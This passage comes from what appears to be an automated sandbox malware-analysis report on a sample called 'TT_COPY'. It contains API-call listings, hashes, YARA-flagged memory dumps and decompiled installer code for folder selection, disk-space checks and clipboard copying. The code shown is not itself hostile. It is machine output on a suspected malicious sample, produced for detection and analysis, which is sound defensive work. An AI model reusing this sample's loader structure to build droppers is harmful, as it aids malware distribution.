                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004058B3
                                                                                                                            • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                                                                            • ShowWindow.USER32(00000008), ref: 00405926
                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                                                            • CreatePopupMenu.USER32 ref: 0040596B
                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                                                            • EmptyClipboard.USER32 ref: 00405A06
                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                                                            • CloseClipboard.USER32 ref: 00405A61
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                            • String ID: {
                                                                                                                            • API String ID: 590372296-366298937
                                                                                                                            • Opcode ID: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
                                                                                                                            • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                                                            • Opcode Fuzzy Hash: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
                                                                                                                            • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                            				signed int _v8;
                                                                                                                            				signed int _v12;
                                                                                                                            				long _v16;
                                                                                                                            				long _v20;
                                                                                                                            				long _v24;
                                                                                                                            				char _v28;
                                                                                                                            				intOrPtr _v32;
                                                                                                                            				long _v36;
                                                                                                                            				char _v40;
                                                                                                                            				unsigned int _v44;
                                                                                                                            				signed int _v48;
                                                                                                                            				WCHAR* _v56;
                                                                                                                            				intOrPtr _v60;
                                                                                                                            				intOrPtr _v64;
                                                                                                                            				intOrPtr _v68;
                                                                                                                            				WCHAR* _v72;
                                                                                                                            				void _v76;
                                                                                                                            				struct HWND__* _v80;
                                                                                                                            				void* __ebx;
                                                                                                                            				void* __edi;
                                                                                                                            				void* __esi;
                                                                                                                            				intOrPtr _t82;
                                                                                                                            				long _t87;
                                                                                                                            				short* _t89;
                                                                                                                            				void* _t95;
                                                                                                                            				signed int _t96;
                                                                                                                            				int _t109;
                                                                                                                            				signed short _t114;
                                                                                                                            				signed int _t118;
                                                                                                                            				struct HWND__** _t122;
                                                                                                                            				intOrPtr* _t138;
                                                                                                                            				WCHAR* _t146;
                                                                                                                            				unsigned int _t150;
                                                                                                                            				signed int _t152;
                                                                                                                            				unsigned int _t156;
                                                                                                                            				signed int _t158;
                                                                                                                            				signed int* _t159;
                                                                                                                            				signed int* _t160;
                                                                                                                            				struct HWND__* _t166;
                                                                                                                            				struct HWND__* _t167;
                                                                                                                            				int _t169;
                                                                                                                            				unsigned int _t197;
                                                                                                                            
                                                                                                                            				_t156 = __edx;
                                                                                                                            				_t82 =  *0x42c240;
                                                                                                                            				_v32 = _t82;
                                                                                                                            				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                                                                                                                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                                                            				if(_a8 == 0x40b) {
                                                                                                                            					E00405B81(0x3fb, _t146);
                                                                                                                            					E004067C4(_t146);
                                                                                                                            				}
                                                                                                                            				_t167 = _a4;
                                                                                                                            				if(_a8 != 0x110) {
                                                                                                                            					L8:
                                                                                                                            					if(_a8 != 0x111) {
                                                                                                                            						L20:
                                                                                                                            						if(_a8 == 0x40f) {
                                                                                                                            							L22:
                                                                                                                            							_v8 = _v8 & 0x00000000;
                                                                                                                            							_v12 = _v12 & 0x00000000;
                                                                                                                            							E00405B81(0x3fb, _t146);
                                                                                                                            							if(E00405F14(_t186, _t146) == 0) {
                                                                                                                            								_v8 = 1;
                                                                                                                            							}
                                                                                                                            							E0040653D(0x42b238, _t146);
                                                                                                                            							_t87 = E0040690A(1);
                                                                                                                            							_v16 = _t87;
                                                                                                                            							if(_t87 == 0) {
                                                                                                                            								L30:
                                                                                                                            								E0040653D(0x42b238, _t146);
                                                                                                                            								_t89 = E00405EB7(0x42b238);
                                                                                                                            								_t158 = 0;
                                                                                                                            								if(_t89 != 0) {
                                                                                                                            									 *_t89 = 0;
                                                                                                                            								}
                                                                                                                            								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                                            									goto L35;
                                                                                                                            								} else {
                                                                                                                            									_t169 = 0x400;
                                                                                                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                                            									asm("cdq");
                                                                                                                            									_v48 = _t109;
                                                                                                                            									_v44 = _t156;
                                                                                                                            									_v12 = 1;
                                                                                                                            									goto L36;
                                                                                                                            								}
                                                                                                                            							} else {
                                                                                                                            								_t159 = 0;
                                                                                                                            								if(0 == 0x42b238) {
                                                                                                                            									goto L30;
                                                                                                                            								} else {
                                                                                                                            									goto L26;
                                                                                                                            								}
                                                                                                                            								while(1) {
                                                                                                                            									L26:
                                                                                                                            									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                                                                                            									if(_t114 != 0) {
                                                                                                                            										break;
                                                                                                                            									}
                                                                                                                            									if(_t159 != 0) {
                                                                                                                            										 *_t159 =  *_t159 & _t114;
                                                                                                                            									}
                                                                                                                            									_t160 = E00405E58(0x42b238);
                                                                                                                            									 *_t160 =  *_t160 & 0x00000000;
                                                                                                                            									_t159 = _t160;
                                                                                                                            									 *_t159 = 0x5c;
                                                                                                                            									if(_t159 != 0x42b238) {
                                                                                                                            										continue;
                                                                                                                            									} else {
                                                                                                                            										goto L30;
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								_t150 = _v44;
                                                                                                                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                                            								_v44 = _t150 >> 0xa;
                                                                                                                            								_v12 = 1;
                                                                                                                            								_t158 = 0;
                                                                                                                            								__eflags = 0;
                                                                                                                            								L35:
                                                                                                                            								_t169 = 0x400;
                                                                                                                            								L36:
                                                                                                                            								_t95 = E00404E27(5);
                                                                                                                            								if(_v12 != _t158) {
                                                                                                                            									_t197 = _v44;
                                                                                                                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                                            										_v8 = 2;
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                                                                                                                            									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                                                                                            									if(_v12 == _t158) {
                                                                                                                            										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                                                                                            									} else {
                                                                                                                            										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								_t96 = _v8;
                                                                                                                            								 *0x434fa4 = _t96;
                                                                                                                            								if(_t96 == _t158) {
                                                                                                                            									_v8 = E0040140B(7);
                                                                                                                            								}
                                                                                                                            								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                                                            									_v8 = _t158;
                                                                                                                            								}
                                                                                                                            								E004044BB(0 | _v8 == _t158);
                                                                                                                            								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                                                                                            									E004048E3();
                                                                                                                            								}
                                                                                                                            								 *0x42d258 = _t158;
                                                                                                                            								goto L53;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						_t186 = _a8 - 0x405;
                                                                                                                            						if(_a8 != 0x405) {
                                                                                                                            							goto L53;
                                                                                                                            						}
                                                                                                                            						goto L22;
                                                                                                                            					}
                                                                                                                            					_t118 = _a12 & 0x0000ffff;
                                                                                                                            					if(_t118 != 0x3fb) {
                                                                                                                            						L12:
                                                                                                                            						if(_t118 == 0x3e9) {
                                                                                                                            							_t152 = 7;
                                                                                                                            							memset( &_v76, 0, _t152 << 2);
                                                                                                                            							_v80 = _t167;
                                                                                                                            							_v72 = 0x42d268;
                                                                                                                            							_v60 = E00404CE0;
                                                                                                                            							_v56 = _t146;
                                                                                                                            							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                                                                                            							_t122 =  &_v80;
                                                                                                                            							_v64 = 0x41;
                                                                                                                            							__imp__SHBrowseForFolderW(_t122);
                                                                                                                            							if(_t122 == 0) {
                                                                                                                            								_a8 = 0x40f;
                                                                                                                            							} else {
                                                                                                                            								__imp__CoTaskMemFree(_t122);
                                                                                                                            								E00405E0C(_t146);
                                                                                                                            								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                                                                                            								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
                                                                                                                            									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                                                                                            									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                                                                                            										lstrcatW(_t146, 0x432ea0);
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								 *0x42d258 =  *0x42d258 + 1;
                                                                                                                            								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						goto L20;
                                                                                                                            					}
                                                                                                                            					if(_a12 >> 0x10 != 0x300) {
                                                                                                                            						goto L53;
                                                                                                                            					}
                                                                                                                            					_a8 = 0x40f;
                                                                                                                            					goto L12;
                                                                                                                            				} else {
                                                                                                                            					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                                                            					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                                                                                            						E00405E0C(_t146);
                                                                                                                            					}
                                                                                                                            					 *0x433ed8 = _t167;
                                                                                                                            					SetWindowTextW(_t166, _t146);
                                                                                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                            					_push(1);
                                                                                                                            					E00404499(_t167);
                                                                                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                            					_push(0x14);
                                                                                                                            					E00404499(_t167);
                                                                                                                            					E004044CE(_t166);
                                                                                                                            					_t138 = E0040690A(8);
                                                                                                                            					if(_t138 == 0) {
                                                                                                                            						L53:
                                                                                                                            						return E00404500(_a8, _a12, _a16);
                                                                                                                            					} else {
                                                                                                                            						 *_t138(_t166, 1);
                                                                                                                            						goto L8;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            			}













































                                                                                                                            0x0040498a
                                                                                                                            0x00404990
                                                                                                                            0x00404996
                                                                                                                            0x004049a3
                                                                                                                            0x004049b1
                                                                                                                            0x004049b4
                                                                                                                            0x004049bc
                                                                                                                            0x004049c2
                                                                                                                            0x004049c2
                                                                                                                            0x004049ce
                                                                                                                            0x004049d1
                                                                                                                            0x00404a3f
                                                                                                                            0x00404a46
                                                                                                                            0x00404b1d
                                                                                                                            0x00404b24
                                                                                                                            0x00404b33
                                                                                                                            0x00404b33
                                                                                                                            0x00404b37
                                                                                                                            0x00404b41
                                                                                                                            0x00404b4e
                                                                                                                            0x00404b50
                                                                                                                            0x00404b50
                                                                                                                            0x00404b5e
                                                                                                                            0x00404b65
                                                                                                                            0x00404b6c
                                                                                                                            0x00404b6f
                                                                                                                            0x00404bab
                                                                                                                            0x00404bad
                                                                                                                            0x00404bb3
                                                                                                                            0x00404bb8
                                                                                                                            0x00404bbc
                                                                                                                            0x00404bbe
                                                                                                                            0x00404bbe
                                                                                                                            0x00404bda
                                                                                                                            0x00000000
                                                                                                                            0x00404bdc
                                                                                                                            0x00404bdf
                                                                                                                            0x00404bed
                                                                                                                            0x00404bf3
                                                                                                                            0x00404bf4
                                                                                                                            0x00404bf7
                                                                                                                            0x00404bfa
                                                                                                                            0x00000000
                                                                                                                            0x00404bfa
                                                                                                                            0x00404b71
                                                                                                                            0x00404b73
                                                                                                                            0x00404b77
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404b79
                                                                                                                            0x00404b79
                                                                                                                            0x00404b86
                                                                                                                            0x00404b8b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404b8f
                                                                                                                            0x00404b91
                                                                                                                            0x00404b91
                                                                                                                            0x00404b9a
                                                                                                                            0x00404b9c
                                                                                                                            0x00404ba1
                                                                                                                            0x00404ba4
                                                                                                                            0x00404ba9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404ba9
                                                                                                                            0x00404c06
                                                                                                                            0x00404c10
                                                                                                                            0x00404c13
                                                                                                                            0x00404c16
                                                                                                                            0x00404c1d
                                                                                                                            0x00404c1d
                                                                                                                            0x00404c1f
                                                                                                                            0x00404c1f
                                                                                                                            0x00404c24
                                                                                                                            0x00404c26
                                                                                                                            0x00404c2e
                                                                                                                            0x00404c35
                                                                                                                            0x00404c37
                                                                                                                            0x00404c42
                                                                                                                            0x00404c42
                                                                                                                            0x00404c37
                                                                                                                            0x00404c52
                                                                                                                            0x00404c5c
                                                                                                                            0x00404c64
                                                                                                                            0x00404c7f
                                                                                                                            0x00404c66
                                                                                                                            0x00404c6f
                                                                                                                            0x00404c6f
                                                                                                                            0x00404c64
                                                                                                                            0x00404c84
                                                                                                                            0x00404c89
                                                                                                                            0x00404c8e
                                                                                                                            0x00404c97
                                                                                                                            0x00404c97
                                                                                                                            0x00404ca0
                                                                                                                            0x00404ca2
                                                                                                                            0x00404ca2
                                                                                                                            0x00404cae
                                                                                                                            0x00404cb6
                                                                                                                            0x00404cc0
                                                                                                                            0x00404cc0
                                                                                                                            0x00404cc5
                                                                                                                            0x00000000
                                                                                                                            0x00404cc5
                                                                                                                            0x00404b6f
                                                                                                                            0x00404b26
                                                                                                                            0x00404b2d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404b2d
                                                                                                                            0x00404a4c
                                                                                                                            0x00404a55
                                                                                                                            0x00404a6f
                                                                                                                            0x00404a74
                                                                                                                            0x00404a7e
                                                                                                                            0x00404a85
                                                                                                                            0x00404a91
                                                                                                                            0x00404a94
                                                                                                                            0x00404a97
                                                                                                                            0x00404a9e
                                                                                                                            0x00404aa6
                                                                                                                            0x00404aa9
                                                                                                                            0x00404aad
                                                                                                                            0x00404ab4
                                                                                                                            0x00404abc
                                                                                                                            0x00404b16
                                                                                                                            0x00404abe
                                                                                                                            0x00404abf
                                                                                                                            0x00404ac6
                                                                                                                            0x00404ad0
                                                                                                                            0x00404ad8
                                                                                                                            0x00404ae5
                                                                                                                            0x00404af9
                                                                                                                            0x00404afd
                                                                                                                            0x00404afd
                                                                                                                            0x00404af9
                                                                                                                            0x00404b02
                                                                                                                            0x00404b0f
                                                                                                                            0x00404b0f
                                                                                                                            0x00404abc
                                                                                                                            0x00000000
                                                                                                                            0x00404a74
                                                                                                                            0x00404a62
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404a68
                                                                                                                            0x00000000
                                                                                                                            0x004049d3
                                                                                                                            0x004049e0
                                                                                                                            0x004049e9
                                                                                                                            0x004049f6
                                                                                                                            0x004049f6
                                                                                                                            0x004049fd
                                                                                                                            0x00404a03
                                                                                                                            0x00404a0c
                                                                                                                            0x00404a0f
                                                                                                                            0x00404a12
                                                                                                                            0x00404a1a
                                                                                                                            0x00404a1d
                                                                                                                            0x00404a20
                                                                                                                            0x00404a26
                                                                                                                            0x00404a2d
                                                                                                                            0x00404a34
                                                                                                                            0x00404ccb
                                                                                                                            0x00404cdd
                                                                                                                            0x00404a3a
                                                                                                                            0x00404a3d
                                                                                                                            0x00000000
                                                                                                                            0x00404a3d
                                                                                                                            0x00404a34

                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                                                            • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                                                              • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                              • Part of subcall function 004067C4: CharPrevW.USER32(?,?,75DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                                                              • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                              • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                                                              • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                            • String ID: A$Call
                                                                                                                            • API String ID: 2624150263-209694386
                                                                                                                            • Opcode ID: 1288a594b8de571b7fe9c44f6f376bcff87d9ab289b7fbb3a41ad597db7e4874
                                                                                                                            • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                                                            • Opcode Fuzzy Hash: 1288a594b8de571b7fe9c44f6f376bcff87d9ab289b7fbb3a41ad597db7e4874
                                                                                                                            • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(2D32AE79), ref: 02B6BBF6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: "0$|@v
                                                                                                                            • API String ID: 1029625771-1170111338
                                                                                                                            • Opcode ID: f7c70c49aadaedb3f10bc03f90c49a0b974c9ec2bba6c887df666af50648ee92
                                                                                                                            • Instruction ID: bd6f69f09e215fe20b7735f1116038c60bb178f6356ed0e91f9dc4e81bd7b40e
                                                                                                                            • Opcode Fuzzy Hash: f7c70c49aadaedb3f10bc03f90c49a0b974c9ec2bba6c887df666af50648ee92
                                                                                                                            • Instruction Fuzzy Hash: B5B1027160434A8FEF349E2989987FA77E2FF95350F94825DCC898B255D3305A42CB02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "0$|@v
                                                                                                                            • API String ID: 0-1170111338
                                                                                                                            • Opcode ID: 56e89b4789e15a74ea7ff4d0d5dc7294eddff85dbb56a9aedc33bcd2680cf72a
                                                                                                                            • Instruction ID: f904c5b57efff04a083e22835053810ea9ab1d223fbcde85a6e9c3276fcd6fb8
                                                                                                                            • Opcode Fuzzy Hash: 56e89b4789e15a74ea7ff4d0d5dc7294eddff85dbb56a9aedc33bcd2680cf72a
                                                                                                                            • Instruction Fuzzy Hash: 4991053160434A9FDF348E258D98BFA77E2EFD5350F94826DDC898B255D3309A42CB02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "0$|@v
                                                                                                                            • API String ID: 0-1170111338
                                                                                                                            • Opcode ID: 2a12284d7baa53d8214573fd5bf9ae36f745e86168969e4a6218ddbe24d29465
                                                                                                                            • Instruction ID: 065660909f4dbedaa18beb629eb8ae4865b5044b6b3db2ec3d6a2fa79ff3d8c5
                                                                                                                            • Opcode Fuzzy Hash: 2a12284d7baa53d8214573fd5bf9ae36f745e86168969e4a6218ddbe24d29465
                                                                                                                            • Instruction Fuzzy Hash: CA81073160438A8FEF358E258D587FA37E2FFD5350F9482A9CC498B259D3349646CB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "0$|@v
                                                                                                                            • API String ID: 0-1170111338
                                                                                                                            • Opcode ID: d66a9e4548b9b1ba0c775fcc2b49e35f40b7d2cb50c78724c7d99e9e57975952
                                                                                                                            • Instruction ID: 7ed06de9e140b9a98af370e9d948d3e9b874f0684ab7ee61c8a15c43471afc2c
                                                                                                                            • Opcode Fuzzy Hash: d66a9e4548b9b1ba0c775fcc2b49e35f40b7d2cb50c78724c7d99e9e57975952
                                                                                                                            • Instruction Fuzzy Hash: 146103317047898FEB34CE248D587EA77E2EFD5350F94829DCC898B259D331AA46CB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "0$|@v
                                                                                                                            • API String ID: 0-1170111338
                                                                                                                            • Opcode ID: 71e40968a2a48d00839920d2c3a1df177a3e486ad6c25c025c285b4d8c31ed8c
                                                                                                                            • Instruction ID: 390a5fc93c5b660c9abf2ef5a01ac9c2c862423783144238aa2c13a0b04d2acf
                                                                                                                            • Opcode Fuzzy Hash: 71e40968a2a48d00839920d2c3a1df177a3e486ad6c25c025c285b4d8c31ed8c
                                                                                                                            • Instruction Fuzzy Hash: 1041D53560434ACFDB34DE398D987EB77E2EF95340F99811ADC898B218D3309A41CB02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 67%
                                                                                                                            			E004021AA() {
                                                                                                                            				signed int _t52;
                                                                                                                            				void* _t56;
                                                                                                                            				intOrPtr* _t60;
                                                                                                                            				intOrPtr _t61;
                                                                                                                            				intOrPtr* _t62;
                                                                                                                            				intOrPtr* _t64;
                                                                                                                            				intOrPtr* _t66;
                                                                                                                            				intOrPtr* _t68;
                                                                                                                            				intOrPtr* _t70;
                                                                                                                            				intOrPtr* _t72;
                                                                                                                            				intOrPtr* _t74;
                                                                                                                            				intOrPtr* _t76;
                                                                                                                            				intOrPtr* _t78;
                                                                                                                            				intOrPtr* _t80;
                                                                                                                            				void* _t83;
                                                                                                                            				intOrPtr* _t91;
                                                                                                                            				signed int _t101;
                                                                                                                            				signed int _t105;
                                                                                                                            				void* _t107;
                                                                                                                            
                                                                                                                            				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                                                                            				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                                                                            				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                                                                            				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
